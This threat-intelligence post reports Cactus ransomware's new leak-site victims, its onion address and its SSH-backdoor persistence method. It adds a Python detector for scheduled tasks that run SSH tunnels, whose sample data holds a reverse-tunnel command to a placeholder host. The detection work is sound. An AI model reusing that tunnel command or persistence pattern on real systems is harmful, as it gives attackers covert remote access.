The notorious ransomware group ‘Cactus’ made headlines again today after listing four more companies on its data leak site. The compromised entities are Lagarde Meregnani, Barsco, Foroni SPA, and Hornsyld Købmandsgaard, all added on 05/09/2023.
The new listings indicate that the group may have gained unauthorized access to these companies’ data and may be threatening to release it unless a ransom is paid.
Historically, ‘Cactus’ has leaked the data of organizations that fail to meet its payment demands, causing significant operational, financial, and reputational damage.
The Cactus Ransomware website
The Cactus Ransomware group operates a blog that is accessible via the Tor network. It is currently hosted at cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion.
TTPs of Cactus Ransomware
After infiltrating the network, the threat actor created a scheduled task to maintain persistent access. The task launched an SSH backdoor that was reachable from the group’s command and control (C2) server.
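One way a defender can hunt for this persistence pattern is to review scheduled-task creations (for example the fields recorded in Windows Security event 4698, or the output of `schtasks /query /xml`) for tasks that launch an SSH client as a tunnel. The following is an added detection example, not code from the page or from any vendor report on Cactus; the task record layout, the list of SSH client names, the allowlisted install directories and the sample task entries are all assumptions constructed for the illustration.

```python
from dataclasses import dataclass

# SSH client executables a scheduled task would rarely run unattended (assumption).
SSH_CLIENTS = {"ssh", "ssh.exe", "plink", "plink.exe"}
# Switches that keep an SSH client alive as a tunnel: reverse forward (-R),
# no remote command (-N), drop to background (-f).
TUNNEL_FLAGS = {"-R", "-N", "-f"}
# Directories where an SSH client is expected to live on this estate (assumption).
EXPECTED_DIRS = ("c:\\windows\\system32\\openssh\\", "c:\\program files\\git\\")

@dataclass
class ScheduledTask:
    name: str       # task name as registered
    command: str    # executable in the task action
    arguments: str  # its command line
    run_as: str     # principal the task runs under
    trigger: str    # e.g. "boot", "logon", "daily", "repeat:5m"

def analyze_task(task):
    """Return the reasons a task looks like an SSH tunnel backdoor (empty if none)."""
    exe = task.command.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in SSH_CLIENTS:
        return []                      # not an SSH client: nothing to score
    reasons = []
    flags = sorted(TUNNEL_FLAGS.intersection(task.arguments.split()))
    if flags:
        reasons.append("tunnel/background flags " + " ".join(flags))
    if task.trigger.startswith(("boot", "logon", "repeat:")):
        reasons.append(f"re-launched by trigger '{task.trigger}'")
    if task.run_as.upper() in {"SYSTEM", "NT AUTHORITY\\SYSTEM"}:
        reasons.append("runs as SYSTEM")
    if not task.command.lower().startswith(EXPECTED_DIRS):
        reasons.append(f"launched from unexpected path {task.command}")
    return reasons

def suspicious_tasks(tasks):
    """Map task name -> reasons for every task that scores at least one reason."""
    return {t.name: analyze_task(t) for t in tasks if analyze_task(t)}

# Constructed sample records: a backup job, a legitimate git-over-ssh sync, and a
# task shaped like the persistence described above (203.0.113.5 is a documentation address).
SAMPLE_TASKS = [
    ScheduledTask("Backup", r"C:\Tools\backup.exe", "--full", "SYSTEM", "daily"),
    ScheduledTask("GitSync", r"C:\Program Files\Git\usr\bin\ssh.exe", "-T git@example.com", "alice", "daily"),
    ScheduledTask("UpdateCheck", r"C:\Windows\Temp\ssh.exe",
                  "-N -R 2222:127.0.0.1:3389 -i C:\\Windows\\Temp\\k relay@203.0.113.5",
                  "SYSTEM", "repeat:5m"),
]

if __name__ == "__main__":
    for name, reasons in suspicious_tasks(SAMPLE_TASKS).items():
        print(name, "->", "; ".join(reasons))
```

Only the third record is reported; the git sync runs an SSH client too, but from an expected path, without tunnel flags, as a normal user, so it scores nothing.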